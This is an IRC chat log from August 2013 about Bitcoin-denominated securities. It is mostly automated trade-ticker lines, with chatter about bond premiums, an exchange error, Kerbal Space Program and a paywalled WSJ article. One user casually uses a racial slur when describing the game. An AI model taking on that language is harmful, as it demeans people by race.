Aug 05 00:30:55 there must be a huge market outside of the US for SD Aug 05 00:31:22 more than 80k in less than a year is remarkable Aug 05 00:31:45 it had a good run fo sho Aug 05 00:32:18 mircea_popescu you should get kerbal space program Aug 05 00:33:53 [BTCTC] [BTCGARDEN] 18 @ 0.01583 = 0.2849 BTC [-] Aug 05 00:33:54 [BTCTC] [BTCGARDEN] 5 @ 0.01584 = 0.0792 BTC [+] Aug 05 00:33:55 whassat ? Aug 05 00:33:55 [BTCTC] [BTCGARDEN] 8 @ 0.01597 = 0.1278 BTC [+] Aug 05 00:33:56 [BTCTC] [BTCGARDEN] 169 @ 0.01597 = 2.6989 BTC [+] Aug 05 00:34:05 ;;google kerbal space program Aug 05 00:34:06 Kerbal Space Program: ; Kerbal Space Program - Wikipedia, the free encyclopedia: ; Kerbal Space Program on Steam: Aug 05 00:36:39 o i recall this thing Aug 05 00:38:39 some nigga built the appollo rocket Aug 05 00:38:43 http://wiki.kerbalspaceprogram.com/wiki/Tutorial:_Apollo_11 Aug 05 00:38:46 Tutorial: Apollo 11 - Kerbal Space Program Wiki Aug 05 00:42:12 [HAVELOCK] [XBOND] 7 @ 0.00107499 = 0.0075 BTC [+] Aug 05 00:43:39 [BTCTC] [DMS.SELLING] 21 @ 0.02088 = 0.4385 BTC [+] Aug 05 00:43:41 [BTCTC] [DMS.SELLING] 20 @ 0.02088 = 0.4176 BTC [+] Aug 05 00:46:33 so i guess i need to warn people not to overpay for xbond... Aug 05 00:46:35 again Aug 05 00:47:11 unless they really want in for the pre-ipos? Aug 05 00:47:17 maybe Aug 05 00:47:44 "2. Speculation - it is entirely possible for this bond to trade above its face value, because it also provides intangible value with its access to Pre-IPO purchases." Aug 05 00:47:46 ;) Aug 05 00:48:01 yeah and read what i said after too Aug 05 00:48:11 i'm referring to like 1-5% or so Aug 05 00:50:02 ThickAsThieves good luck with that. s.mg trades at 2.5x book for some reason Aug 05 00:50:24 +7%, it's not too crazy. however I put up some sell orders at +19% face value just in case someone goes mad :p Aug 05 00:50:26 except xbond has a face value and a callback at 105% Aug 05 00:50:39 [BTCTC] [ACTIVEMINING] 1 @ 0.006155 BTC [+] Aug 05 00:50:52 well it would be a 2% loss, if the callback was today Aug 05 00:51:30 i bet you the forum'd be replete with "omg scam" Aug 05 00:51:37 mircea_popescu: s.mg has a lot of cash on hand despite lack of operating revenue; expenses are ridiculously low per month atm too so why shouldn't it trade high? Aug 05 00:51:45 teh people. will not read, then behave as if that changes reality. Aug 05 00:52:13 [BTCTC] [DMS.SELLING] 20 @ 0.0209 = 0.418 BTC [+] Aug 05 00:52:22 thestringpuller i can't say it shouldn't, obviously. which is the similarity with ThickAsThieves' situation. Aug 05 00:52:38 maybe it should, who's to know. Aug 05 00:52:57 [BTCTC] [DMS.SELLING] 3 @ 0.0209 = 0.0627 BTC [+] Aug 05 00:54:01 what's that word you two used before? Aug 05 00:54:04 was it mania? Aug 05 00:55:47 Wow Apollo was a $120 billion dollar endeavor Aug 05 00:56:03 and now we just send SUV's to Mars. :( Aug 05 00:57:06 [BTCTC] [LABCOIN] 850 @ 0.001693 = 1.4391 BTC [+] Aug 05 00:57:46 [BTCTC] [BTCGARDEN] 31 @ 0.01597 = 0.4951 BTC [+] Aug 05 00:59:26 [BTCTC] [BASIC-MINING] 44 @ 0.4054 = 17.8376 BTC [+] Aug 05 01:01:23 [BTCTC] [BASIC-MINING] 20 @ 0.4055 = 8.11 BTC [+] Aug 05 01:03:36 [BTCTC] [BTCGARDEN] 200 @ 0.01598 = 3.196 BTC [+] Aug 05 01:03:58 [BTCTC] [LABCOIN] 60 @ 0.001692 = 0.1015 BTC [-] Aug 05 01:06:27 [BTCTC] [DMS.SELLING] 1 @ 0.0209 BTC [+] Aug 05 01:08:37 [BTCTC] [ACTIVEMINING] 8 @ 0.006145 = 0.0492 BTC [-] Aug 05 01:09:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.04096 = 0.2048 BTC [-] Aug 05 01:10:18 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 05 01:10:27 [BTCTC] [LABCOIN] 73 @ 0.001668 = 0.1218 BTC [-] Aug 05 01:10:29 [BTCTC] [LABCOIN] 1 @ 0.001666 BTC [-] Aug 05 01:10:30 [BTCTC] [LABCOIN] 50 @ 0.00166 = 0.083 BTC [-] Aug 05 01:10:32 [BTCTC] [LABCOIN] 3 @ 0.001643 = 0.0049 BTC [-] Aug 05 01:10:33 [BTCTC] [LABCOIN] 166 @ 0.001637 = 0.2717 BTC [-] Aug 05 01:10:34 [BTCTC] [LABCOIN] 1000 @ 0.001636 = 1.636 BTC [-] Aug 05 01:10:36 [BTCTC] [LABCOIN] 5 @ 0.001624 = 0.0081 BTC [-] Aug 05 01:10:37 [BTCTC] [LABCOIN] 502 @ 0.001623 = 0.8147 BTC [-] Aug 05 01:10:38 [BTCTC] [BTCGARDEN] 1 @ 0.01608 BTC [+] Aug 05 01:13:11 [BTCTC] [DMS.SELLING] 4 @ 0.0209 = 0.0836 BTC [+] Aug 05 01:13:39 [BTCTC] [BITVPS] 1 @ 0.002102 BTC [-] Aug 05 01:13:41 [BTCTC] [BITVPS] 1 @ 0.002101 BTC [-] Aug 05 01:13:43 [BTCTC] [BITVPS] 3 @ 0.0021 = 0.0063 BTC [-] Aug 05 01:16:42 [BTCTC] [LABCOIN] 5 @ 0.001692 = 0.0085 BTC [+] Aug 05 01:19:04 [BTCTC] [BTC-BOND] 40 @ 0.009999 = 0.4 BTC [-] **** ENDING LOGGING AT Mon Aug 5 01:22:10 2013 **** BEGIN LOGGING AT Mon Aug 5 07:31:54 2013 Aug 05 07:32:53 !ticker btctc DMC.PURCHASE Aug 05 07:32:54 Um, shouldn't you be with your own tribe or somethin'? Aug 05 07:33:02 !ticker btctc DMS.PURCHASE Aug 05 07:33:03 [BTCT:DMS.PURCHASE] 1D: 0.02639 / 0.0283 / 0.03387 (1871 shares, 52.9 BTC), 7D: 0.02639 / 0.03106 / 0.03401 (3909 shares, 121.4 BTC), 30D: 0.02639 / 0.04022 / 0.049181 (28808 shares, 1158.7 BTC) Aug 05 07:35:41 [BTCTC] [BTCGARDEN] 153 @ 0.01499 = 2.2935 BTC [+] Aug 05 07:35:42 [BTCTC] [LABCOIN] 40 @ 0.001495 = 0.0598 BTC [-] Aug 05 07:35:43 [BTCTC] [BTCGARDEN] 1405 @ 0.015 = 21.075 BTC [+] Aug 05 07:35:45 [BTCTC] [BTCGARDEN] 55 @ 0.01597 = 0.8784 BTC [+] Aug 05 07:35:46 [BTCTC] [BTCGARDEN] 444 @ 0.01598 = 7.0951 BTC [+] Aug 05 07:36:05 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [+] Aug 05 07:36:26 [BTCTC] [DMS.PURCHASE] 14 @ 0.02824 = 0.3954 BTC [+] Aug 05 07:37:22 [BTCTC] [BTCGARDEN] 1358 @ 0.016 = 21.728 BTC [+] Aug 05 07:38:05 [BTCTC] [ACTIVEMINING] 40 @ 0.005225 = 0.209 BTC [-] Aug 05 07:38:19 [BTCTC] [LABCOIN] 50 @ 0.001332 = 0.0666 BTC [-] Aug 05 07:38:20 [BTCTC] [LABCOIN] 6 @ 0.001331 = 0.008 BTC [-] Aug 05 07:38:21 [BTCTC] [LABCOIN] 2 @ 0.001329 = 0.0027 BTC [-] Aug 05 07:41:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.03937 = 0.1969 BTC [+] Aug 05 07:42:01 [BTCTC] [COGNITIVE] 2 @ 0.441 = 0.882 BTC [-] Aug 05 07:45:08 [BTCTC] [LABCOIN] 50 @ 0.001316 = 0.0658 BTC [-] Aug 05 07:45:09 [BTCTC] [LABCOIN] 6 @ 0.001317 = 0.0079 BTC [+] Aug 05 07:45:39 [BTCTC] [BTCGARDEN] 37 @ 0.016 = 0.592 BTC [+] Aug 05 07:46:38 [BTCTC] [ACTIVEMINING] 1 @ 0.005225 BTC [-] Aug 05 07:47:01 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [+] Aug 05 07:48:09 [BTCTC] [ASICMINER-PT] 1 @ 4.08 BTC [+] Aug 05 07:49:09 [BTCTC] [LABCOIN] 50 @ 0.001318 = 0.0659 BTC [+] Aug 05 07:49:10 [BTCTC] [LABCOIN] 1 @ 0.001319 BTC [+] Aug 05 07:49:11 [BTCTC] [LABCOIN] 38 @ 0.00132 = 0.0502 BTC [+] Aug 05 07:49:13 [BTCTC] [LABCOIN] 4 @ 0.001349 = 0.0054 BTC [+] Aug 05 07:49:13 [BTCTC] [LABCOIN] 51 @ 0.00135 = 0.0689 BTC [+] Aug 05 07:50:15 [BTCTC] [BTCGARDEN] 37 @ 0.016 = 0.592 BTC [+] Aug 05 07:50:16 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 05 07:51:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.03936 BTC [-] Aug 05 07:51:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.03936 = 0.1968 BTC [-] Aug 05 07:52:50 [BTCTC] [ACTIVEMINING] 70 @ 0.005225 = 0.3658 BTC [-] Aug 05 07:52:51 [BTCTC] [ACTIVEMINING] 259 @ 0.0053 = 1.3727 BTC [+] Aug 05 07:53:26 ;;seen mod6 Aug 05 07:53:26 mod6 was last seen in #bitcoin-assets 1 day, 0 hours, 19 minutes, and 1 second ago: ;;later tell thestringpuller hey whats up. saw you were lookin for me. have been afk for a few days - been moving. drop me a pm if you need. Aug 05 07:53:29 [BTCTC] [ACTIVEMINING] 1 @ 0.0053 BTC [+] Aug 05 07:53:30 lol 1 day Aug 05 07:58:28 [BTCTC] [BTCGARDEN] 12 @ 0.01551 = 0.1861 BTC [-] Aug 05 07:59:12 [BTCTC] [BTCGARDEN] 96 @ 0.0155 = 1.488 BTC [-] Aug 05 07:59:37 [BTCTC] [LABCOIN] 18 @ 0.001282 = 0.0231 BTC [-] Aug 05 07:59:54 [BTCTC] [DMS.SELLING] 5 @ 0.0217 = 0.1085 BTC [+] Aug 05 07:59:54 [BTCTC] [LABCOIN] 220 @ 0.001285 = 0.2827 BTC [+] Aug 05 08:00:36 [BTCTC] [LABCOIN] 50 @ 0.001295 = 0.0648 BTC [+] Aug 05 08:01:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.03934 = 0.3934 BTC [-] Aug 05 08:01:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.03934 = 1.967 BTC [-] Aug 05 08:02:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.03935 BTC [+] Aug 05 08:05:38 [BTCTC] [BASIC-MINING] 1 @ 0.3951 BTC [+] Aug 05 08:06:26 [BTCTC] [BASIC-MINING] 1 @ 0.395 BTC [-] Aug 05 08:07:05 [BTCTC] [DMS.PURCHASE] 1 @ 0.02824 BTC [+] Aug 05 08:07:08 [BTCTC] [BTCGARDEN] 5 @ 0.01531 = 0.0766 BTC [-] Aug 05 08:07:38 [BTCTC] [BTCGARDEN] 40 @ 0.0153 = 0.612 BTC [-] Aug 05 08:08:09 [BTCTC] [BTCGARDEN] 31 @ 0.01521 = 0.4715 BTC [-] Aug 05 08:08:44 [BTCTC] [BTCGARDEN] 250 @ 0.0152 = 3.8 BTC [-] Aug 05 08:13:28 [BTCTC] [BTCGARDEN] 166 @ 0.01521 = 2.5249 BTC [+] Aug 05 08:13:29 [MPEX] [S.MPOE] 5800 @ 0.00082447 = 4.7819 BTC [-] Aug 05 08:17:26 [MPEX] [S.MPOE] 1176 @ 0.00082325 = 0.9681 BTC [-] Aug 05 08:17:28 [MPEX] [S.MPOE] 1869 @ 0.00082303 = 1.5382 BTC [-] Aug 05 08:18:33 [BTCTC] [DMS.SELLING] 10 @ 0.021 = 0.21 BTC [-] Aug 05 08:18:35 [BTCTC] [DMS.SELLING] 20 @ 0.02061 = 0.4122 BTC [-] Aug 05 08:20:26 [BTCTC] [LABCOIN] 3 @ 0.001297 = 0.0039 BTC [+] Aug 05 08:21:07 [BTCTC] [ACTIVEMINING] 3 @ 0.005344 = 0.016 BTC [+] Aug 05 08:22:02 [BTCTC] [LABCOIN] 3 @ 0.001324 = 0.004 BTC [+] Aug 05 08:22:48 [BTCTC] [LABCOIN] 80 @ 0.001325 = 0.106 BTC [+] Aug 05 08:22:50 [BTCTC] [LABCOIN] 2 @ 0.001349 = 0.0027 BTC [+] Aug 05 08:22:51 [BTCTC] [LABCOIN] 19 @ 0.00135 = 0.0257 BTC [+] Aug 05 08:22:52 [BTCTC] [LABCOIN] 3 @ 0.001394 = 0.0042 BTC [+] Aug 05 08:22:53 [BTCTC] [LABCOIN] 25 @ 0.001395 = 0.0349 BTC [+] Aug 05 08:22:54 [BTCTC] [LABCOIN] 584 @ 0.001449 = 0.8462 BTC [+] Aug 05 08:22:55 [BTCTC] [LABCOIN] 220 @ 0.001495 = 0.3289 BTC [+] Aug 05 08:22:56 [BTCTC] [LABCOIN] 1914 @ 0.001497 = 2.8653 BTC [+] Aug 05 08:22:57 [BTCTC] [LABCOIN] 2153 @ 0.001498 = 3.2252 BTC [+] Aug 05 08:24:55 [BTCTC] [BTC-BOND] 16 @ 0.00999 = 0.1598 BTC [-] Aug 05 08:25:03 [BTCTC] [LABCOIN] 6 @ 0.001497 = 0.009 BTC [-] Aug 05 08:25:04 [BTCTC] [LABCOIN] 6241 @ 0.001498 = 9.349 BTC [+] Aug 05 08:29:58 [BTCTC] [BTCGARDEN] 1 @ 0.01522 BTC [+] Aug 05 08:29:59 [BTCTC] [BTCGARDEN] 180 @ 0.01521 = 2.7378 BTC [-] Aug 05 08:30:01 [BTCTC] [BTCGARDEN] 819 @ 0.0152 = 12.4488 BTC [-] Aug 05 08:30:07 [BTCTC] [BTCGARDEN] 125 @ 0.01594 = 1.9925 BTC [+] Aug 05 08:30:08 [BTCTC] [BTCGARDEN] 1000 @ 0.01595 = 15.95 BTC [+] Aug 05 08:30:09 [BTCTC] [BTCGARDEN] 69 @ 0.01596 = 1.1012 BTC [+] Aug 05 08:33:30 [BTCTC] [LABCOIN] 6 @ 0.001498 = 0.009 BTC [+] Aug 05 08:33:30 [BTCTC] [LABCOIN] 10 @ 0.001554 = 0.0155 BTC [+] Aug 05 08:33:32 [BTCTC] [LABCOIN] 1000 @ 0.001555 = 1.555 BTC [+] Aug 05 08:33:33 [BTCTC] [LABCOIN] 3000 @ 0.001555 = 4.665 BTC [+] Aug 05 08:33:34 [BTCTC] [LABCOIN] 4984 @ 0.001648 = 8.2136 BTC [+] Aug 05 08:35:32 [BTCTC] [BITVPS] 45 @ 0.002001 = 0.09 BTC [-] Aug 05 08:35:34 [BTCTC] [KENILWORTH] 1 @ 0.001627 BTC [+] Aug 05 08:35:59 [BTCTC] [BITVPS] 250 @ 0.002 = 0.5 BTC [-] Aug 05 08:36:16 [BTCTC] [BITVPS] 1 @ 0.001612 BTC [-] Aug 05 08:36:34 [BTCTC] [BTCGARDEN] 400 @ 0.01596 = 6.384 BTC [+] Aug 05 08:36:35 [BTCTC] [ACTIVEMINING] 10 @ 0.005113 = 0.0511 BTC [-] Aug 05 08:37:33 [BTCTC] [LABCOIN] 5 @ 0.001604 = 0.008 BTC [-] Aug 05 08:37:35 [BTCTC] [LABCOIN] 695 @ 0.001641 = 1.1405 BTC [+] Aug 05 08:43:00 [BTCTC] [DMS.MINING] 2 @ 0.008001 = 0.016 BTC [-] Aug 05 08:43:01 [BTCTC] [DMS.MINING] 2 @ 0.008 = 0.016 BTC [-] Aug 05 08:43:22 [BTCTC] [ACTIVEMINING] 10 @ 0.005343 = 0.0534 BTC [+] Aug 05 08:43:23 [BTCTC] [ACTIVEMINING] 90 @ 0.005344 = 0.481 BTC [+] Aug 05 08:43:33 im sure its been asked before, but whats the trick for besting "Excessive wait trying to get lock on xxxxxx"? my googlefu turned up nada. Aug 05 08:43:39 on btct.co that i Aug 05 08:43:41 *is Aug 05 08:46:05 [BTCTC] [TAT.ASICMINER] 7 @ 0.03954 = 0.2768 BTC [+] Aug 05 08:46:06 [BTCTC] [TAT.ASICMINER] 36 @ 0.03954 = 1.4234 BTC [+] Aug 05 08:46:07 [BTCTC] [TAT.ASICMINER] 15 @ 0.03989 = 0.5984 BTC [+] Aug 05 08:46:08 [BTCTC] [TAT.ASICMINER] 18 @ 0.0399 = 0.7182 BTC [+] Aug 05 08:46:17 Try, try, again Rawted Aug 05 08:46:36 [BTCTC] [BTCGARDEN] 104 @ 0.0154 = 1.6016 BTC [-] Aug 05 08:46:37 [BTCTC] [BTCGARDEN] 125 @ 0.01526 = 1.9075 BTC [-] Aug 05 08:46:39 [BTCTC] [BTCGARDEN] 1000 @ 0.01525 = 15.25 BTC [-] Aug 05 08:46:40 [BTCTC] [BTCGARDEN] 200 @ 0.015 = 3 BTC [-] Aug 05 08:46:40 [BTCTC] [BTCGARDEN] 21 @ 0.01476 = 0.31 BTC [-] Aug 05 08:46:52 ok, thanks Aug 05 08:48:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.03989 = 0.2792 BTC [-] Aug 05 08:48:19 [BTCTC] [TAT.ASICMINER] 193 @ 0.0399 = 7.7007 BTC [+] Aug 05 08:48:29 [BTCTC] [DMS.SELLING] 1 @ 0.02061 BTC [-] Aug 05 08:49:07 [BTCTC] [ACTIVEMINING] 250 @ 0.005344 = 1.336 BTC [+] Aug 05 08:49:09 [BTCTC] [LABCOIN] 20 @ 0.00164 = 0.0328 BTC [-] Aug 05 08:49:11 [BTCTC] [LABCOIN] 1240 @ 0.00164 = 2.0336 BTC [-] Aug 05 08:49:30 [BTCTC] [DMS.MINING] 2 @ 0.008001 = 0.016 BTC [+] Aug 05 08:49:55 [BTCTC] [LABCOIN] 50 @ 0.001416 = 0.0708 BTC [-] Aug 05 08:49:57 [BTCTC] [LABCOIN] 3524 @ 0.001416 = 4.99 BTC [-] Aug 05 08:49:58 [BTCTC] [LABCOIN] 100 @ 0.001415 = 0.1415 BTC [-] Aug 05 08:49:59 [BTCTC] [LABCOIN] 6 @ 0.001413 = 0.0085 BTC [-] Aug 05 08:49:59 [BTCTC] [LABCOIN] 152 @ 0.001412 = 0.2146 BTC [-] Aug 05 08:50:01 [BTCTC] [LABCOIN] 1116 @ 0.00141 = 1.5736 BTC [-] Aug 05 08:50:02 [BTCTC] [LABCOIN] 1 @ 0.001406 BTC [-] Aug 05 08:50:03 [BTCTC] [LABCOIN] 15 @ 0.001405 = 0.0211 BTC [-] Aug 05 08:50:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.0399 = 0.1596 BTC [+] Aug 05 08:50:05 [BTCTC] [LABCOIN] 447 @ 0.001402 = 0.6267 BTC [-] Aug 05 08:50:06 [BTCTC] [LABCOIN] 15 @ 0.0014 = 0.021 BTC [-] Aug 05 08:50:07 [HAVELOCK] [XBOND] 28 @ 0.00104995 = 0.0294 BTC [+] Aug 05 08:50:09 [BTCTC] [LABCOIN] 625 @ 0.001366 = 0.8538 BTC [-] Aug 05 08:50:11 [BTCTC] [LABCOIN] 5000 @ 0.001365 = 6.825 BTC [-] Aug 05 08:50:11 [BTCTC] [LABCOIN] 10 @ 0.001351 = 0.0135 BTC [-] Aug 05 08:50:12 [BTCTC] [LABCOIN] 80 @ 0.00135 = 0.108 BTC [-] Aug 05 08:50:13 [BTCTC] [LABCOIN] 1250 @ 0.001313 = 1.6413 BTC [-] Aug 05 08:50:14 [BTCTC] [LABCOIN] 10000 @ 0.001312 = 13.12 BTC [-] Aug 05 08:50:15 [BTCTC] [LABCOIN] 1 @ 0.001312 BTC [-] Aug 05 08:50:16 [BTCTC] [LABCOIN] 509 @ 0.001311 = 0.6673 BTC [-] Aug 05 08:50:17 [BTCTC] [LABCOIN] 11450 @ 0.00131 = 14.9995 BTC [-] Aug 05 08:50:18 [BTCTC] [LABCOIN] 47 @ 0.001279 = 0.0601 BTC [-] Aug 05 08:50:19 [BTCTC] [LABCOIN] 708 @ 0.00126 = 0.8921 BTC [-] Aug 05 08:50:20 [BTCTC] [LABCOIN] 5000 @ 0.001255 = 6.275 BTC [-] Aug 05 08:50:20 [BTCTC] [LABCOIN] 500 @ 0.00124 = 0.62 BTC [-] Aug 05 08:50:21 [BTCTC] [LABCOIN] 9000 @ 0.00123 = 11.07 BTC [-] Aug 05 08:50:22 [BTCTC] [LABCOIN] 8023 @ 0.001221 = 9.7961 BTC [-] Aug 05 08:50:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.04 = 0.6 BTC [+] Aug 05 08:54:32 [BTCTC] [ACTIVEMINING] 13 @ 0.005344 = 0.0695 BTC [+] Aug 05 08:59:07 [MPEX] [S.MPOE] 6283 @ 0.00082101 = 5.1584 BTC [-] Aug 05 09:01:03 [BTCTC] [BITVPS] 40 @ 0.001615 = 0.0646 BTC [+] Aug 05 09:03:32 [BTCTC] [LABCOIN] 50 @ 0.001485 = 0.0743 BTC [+] Aug 05 09:08:41 [BTCTC] [DMS.SELLING] 100 @ 0.0208 = 2.08 BTC [+] Aug 05 09:08:42 [BTCTC] [DMS.SELLING] 20 @ 0.0208 = 0.416 BTC [+] Aug 05 09:08:44 [BTCTC] [DMS.SELLING] 25 @ 0.0207 = 0.5175 BTC [-] Aug 05 09:08:45 [BTCTC] [DMS.SELLING] 79 @ 0.02061 = 1.6282 BTC [-] Aug 05 09:08:46 [BTCTC] [DMS.SELLING] 663 @ 0.02061 = 13.6644 BTC [-] Aug 05 09:14:00 [BTCTC] [DMS.SELLING] 6 @ 0.0216 = 0.1296 BTC [+] Aug 05 09:15:29 [BTCTC] [ACTIVEMINING] 1 @ 0.005557 BTC [+] Aug 05 09:15:31 [BTCTC] [ACTIVEMINING] 125 @ 0.00565 = 0.7063 BTC [+] Aug 05 09:17:09 [BTCTC] [ACTIVEMINING] 1714 @ 0.005239 = 8.9796 BTC [-] Aug 05 09:17:10 [BTCTC] [ACTIVEMINING] 453 @ 0.005238 = 2.3728 BTC [-] Aug 05 09:17:11 [BTCTC] [ACTIVEMINING] 50 @ 0.005234 = 0.2617 BTC [-] Aug 05 09:17:12 [BTCTC] [ACTIVEMINING] 125 @ 0.005161 = 0.6451 BTC [-] Aug 05 09:17:14 [BTCTC] [ACTIVEMINING] 500 @ 0.00516 = 2.58 BTC [-] Aug 05 09:17:15 [BTCTC] [ACTIVEMINING] 3 @ 0.005151 = 0.0155 BTC [-] Aug 05 09:17:16 [BTCTC] [ACTIVEMINING] 12 @ 0.00515 = 0.0618 BTC [-] Aug 05 09:17:17 [BTCTC] [ACTIVEMINING] 42 @ 0.005111 = 0.2147 BTC [-] Aug 05 09:17:18 [BTCTC] [ACTIVEMINING] 170 @ 0.00511 = 0.8687 BTC [-] Aug 05 09:17:19 [BTCTC] [ACTIVEMINING] 1 @ 0.0051 BTC [-] Aug 05 09:17:20 [BTCTC] [ACTIVEMINING] 12 @ 0.005051 = 0.0606 BTC [-] Aug 05 09:17:20 [BTCTC] [ACTIVEMINING] 50 @ 0.00505 = 0.2525 BTC [-] Aug 05 09:17:22 [BTCTC] [ACTIVEMINING] 166 @ 0.005043 = 0.8371 BTC [-] Aug 05 09:17:23 [BTCTC] [ACTIVEMINING] 666 @ 0.005042 = 3.358 BTC [-] Aug 05 09:17:24 [BTCTC] [ACTIVEMINING] 12 @ 0.005028 = 0.0603 BTC [-] Aug 05 09:17:25 [BTCTC] [ACTIVEMINING] 1 @ 0.005027 BTC [-] Aug 05 09:17:26 [BTCTC] [ACTIVEMINING] 23 @ 0.005025 = 0.1156 BTC [-] Aug 05 09:18:46 [BTCTC] [LABCOIN] 300 @ 0.001496 = 0.4488 BTC [+] Aug 05 09:21:00 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 05 09:21:11 [HAVELOCK] [LABCO] 10 @ 0.002 = 0.02 BTC [+] Aug 05 09:21:28 [HAVELOCK] [LABCO] 10 @ 0.002 = 0.02 BTC [+] Aug 05 09:21:58 [HAVELOCK] [LABCO] 8 @ 0.002 = 0.016 BTC [+] Aug 05 09:22:00 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [+] Aug 05 09:22:16 [BTCTC] [LABCOIN] 50 @ 0.001306 = 0.0653 BTC [-] Aug 05 09:22:18 [BTCTC] [LABCOIN] 200 @ 0.001305 = 0.261 BTC [-] Aug 05 09:22:19 [BTCTC] [LABCOIN] 5 @ 0.001302 = 0.0065 BTC [-] Aug 05 09:22:21 [BTCTC] [LABCOIN] 8 @ 0.001302 = 0.0104 BTC [-] Aug 05 09:23:17 [BTCTC] [LABCOIN] 50 @ 0.001304 = 0.0652 BTC [+] Aug 05 09:23:31 [BTCTC] [LABCOIN] 326 @ 0.001303 = 0.4248 BTC [-] Aug 05 09:23:32 [BTCTC] [LABCOIN] 42 @ 0.001302 = 0.0547 BTC [-] Aug 05 09:23:34 [BTCTC] [LABCOIN] 260 @ 0.0013 = 0.338 BTC [-] Aug 05 09:23:35 [BTCTC] [LABCOIN] 30 @ 0.0013 = 0.039 BTC [-] Aug 05 09:23:36 [BTCTC] [LABCOIN] 75 @ 0.0013 = 0.0975 BTC [-] Aug 05 09:24:41 [BTCTC] [LABCOIN] 50 @ 0.001297 = 0.0649 BTC [-] Aug 05 09:24:41 [BTCTC] [LABCOIN] 22 @ 0.001298 = 0.0286 BTC [+] Aug 05 09:24:42 [BTCTC] [LABCOIN] 28 @ 0.0013 = 0.0364 BTC [+] Aug 05 09:25:15 [BTCTC] [LABCOIN] 50 @ 0.001299 = 0.065 BTC [-] Aug 05 09:25:16 [BTCTC] [LABCOIN] 50 @ 0.0013 = 0.065 BTC [+] Aug 05 09:25:44 [BTCTC] [BTC-TRADING-PT] 10 @ 0.806 = 8.06 BTC [-] Aug 05 09:25:53 [BTCTC] [LABCOIN] 50 @ 0.0013 = 0.065 BTC [+] Aug 05 09:30:27 [BTCTC] [LABCOIN] 500 @ 0.0014 = 0.7 BTC [+] Aug 05 09:30:29 [BTCTC] [LABCOIN] 1 @ 0.001464 BTC [+] Aug 05 09:30:30 [BTCTC] [LABCOIN] 500 @ 0.001465 = 0.7325 BTC [+] Aug 05 09:30:31 [BTCTC] [LABCOIN] 2599 @ 0.001467 = 3.8127 BTC [+] Aug 05 09:32:31 [BTCTC] [LABCOIN] 10 @ 0.001466 = 0.0147 BTC [-] Aug 05 09:37:34 [BTCTC] [DMS.MINING] 10 @ 0.008212 = 0.0821 BTC [+] Aug 05 09:40:55 [BTCTC] [BTCGARDEN] 2 @ 0.01569 = 0.0314 BTC [+] Aug 05 09:40:57 [BTCTC] [BTCGARDEN] 21 @ 0.0157 = 0.3297 BTC [+] Aug 05 09:40:57 [BTCTC] [BTCGARDEN] 62 @ 0.01589 = 0.9852 BTC [+] Aug 05 09:40:58 [BTCTC] [BTCGARDEN] 15 @ 0.0159 = 0.2385 BTC [+] Aug 05 09:42:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.03901 = 0.117 BTC [-] Aug 05 09:42:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.03901 = 1.9505 BTC [-] Aug 05 09:42:17 [BTCTC] [TAT.ASICMINER] 18 @ 0.039 = 0.702 BTC [-] Aug 05 09:42:18 [BTCTC] [TAT.ASICMINER] 65 @ 0.03869 = 2.5149 BTC [-] Aug 05 09:42:19 [BTCTC] [TAT.ASICMINER] 100 @ 0.03868 = 3.868 BTC [-] Aug 05 09:42:21 [BTCTC] [TAT.ASICMINER] 196 @ 0.03866 = 7.5774 BTC [-] Aug 05 09:42:52 [BTCTC] [LABCOIN] 12 @ 0.001424 = 0.0171 BTC [-] Aug 05 09:43:14 [BTCTC] [LABCOIN] 100 @ 0.001425 = 0.1425 BTC [+] Aug 05 09:43:15 [BTCTC] [LABCOIN] 746 @ 0.001459 = 1.0884 BTC [+] Aug 05 09:43:15 [BTCTC] [LABCOIN] 154 @ 0.00146 = 0.2248 BTC [+] Aug 05 09:43:40 [BTCTC] [BTCGARDEN] 10 @ 0.01589 = 0.1589 BTC [-] Aug 05 09:44:21 [BTCTC] [LABCOIN] 23 @ 0.00146 = 0.0336 BTC [+] Aug 05 09:45:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005503 = 0.2752 BTC [+] Aug 05 09:45:48 [BTCTC] [ACTIVEMINING] 50 @ 0.005502 = 0.2751 BTC [-] Aug 05 09:45:50 [BTCTC] [ACTIVEMINING] 3 @ 0.0055 = 0.0165 BTC [-] Aug 05 09:46:26 http://online.wsj.com/article/SB10001424127887323997004578644491403250124.html Aug 05 09:46:29 Famed Trader Joe Lewis Backs Bitcoin - WSJ.com Aug 05 09:46:46 [BTCTC] [S.MPOE-PT] 7 @ 0.0009989 = 0.007 BTC [-] Aug 05 09:46:47 [BTCTC] [S.MPOE-PT] 1 @ 0.0009989 BTC [-] Aug 05 09:46:49 The article! oh no! Dump 6.0 is on! Aug 05 09:48:18 [BTCTC] [LABCOIN] 1 @ 0.001391 BTC [-] Aug 05 09:48:55 [BTCTC] [DMS.MINING] 100 @ 0.00865 = 0.865 BTC [+] Aug 05 09:49:57 Exocyst huh ? Aug 05 09:50:24 [BTCTC] [DMS.MINING] 22 @ 0.00865 = 0.1903 BTC [+] Aug 05 09:52:03 [BTCTC] [LABCOIN] 500 @ 0.001432 = 0.716 BTC [+] Aug 05 09:52:56 fuck i'm glad i took that small profit on btc garden now Aug 05 09:53:03 anyone who keeps posting the wsj article.. is there a trick to keep reading? Aug 05 09:53:24 [BTCTC] [LABCOIN] 150 @ 0.00143 = 0.2145 BTC [-] Aug 05 09:53:32 it shows only 2 paragraphs and "try a subscription" Aug 05 09:53:41 wsj (w/o the paywall) it's mostly if's and but's Aug 05 09:53:57 link: https://bitcointalk.org/index.php?topic=254930.msg2868456#msg2868456 Aug 05 09:53:59 mkay 